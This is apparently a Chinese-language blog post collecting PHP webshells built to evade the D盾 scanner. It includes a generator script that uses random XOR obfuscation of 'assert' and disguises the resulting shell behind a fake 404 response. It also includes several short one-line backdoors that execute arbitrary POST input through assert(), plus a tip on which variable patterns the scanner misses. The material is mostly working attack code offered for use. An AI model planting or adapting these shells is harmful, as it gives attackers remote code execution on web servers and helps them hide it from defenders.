准备写一个长期更新的免杀webshell总结

2019-05-21

https://github.com/yzddmr6/php_xor_bypass

利用随机异或无限免杀d盾

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php
//code by Mr6
error_reporting(0);
    function randomkeys($length)   
{   
   $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
}   
    function randname($length)   
{   
   $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
} 
    $str=randomkeys(6); 
    $bname=randname(4);
    $lname=strrev(strtolower($bname));
    $str2="assert";
            echo "<?php \n";
            echo "header('HTTP/1.1 404');\n";
            echo "class  ".$bname."{ public \$c='';\nfunction __destruct(){\n";
    for ($i=0;$i<6;$i++)
    {
        $name="_".$i;
        $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
        echo "$"."$name=";
    echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
    }
    $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
    echo $aa;
    echo "\n";
    echo '@$db ("$this->c");}}';
    echo "\n";
    echo "\${$lname}=new {$bname}();\n";
    echo "@\${$lname}->c=\$_POST['Mr6'];\n";
    echo "?>\n";
    @$file=$_GET['file'];
    $html = ob_get_contents();
    if (isset($file)){
    if(file_put_contents($file,$html))
    echo "\n\n\n".$file."   save success!";}
    else {echo "Please input the file name like '?file=xxx.txt'";}
    ?>

2019-05-11

1
2
3
4
5
6
7
<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>

1
2
3
4
5
6
<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}

1
2
3
4
5
6
7
8
<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");

for ($x=0; $x<=0; $x++) {
    assert("$x");
}

可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了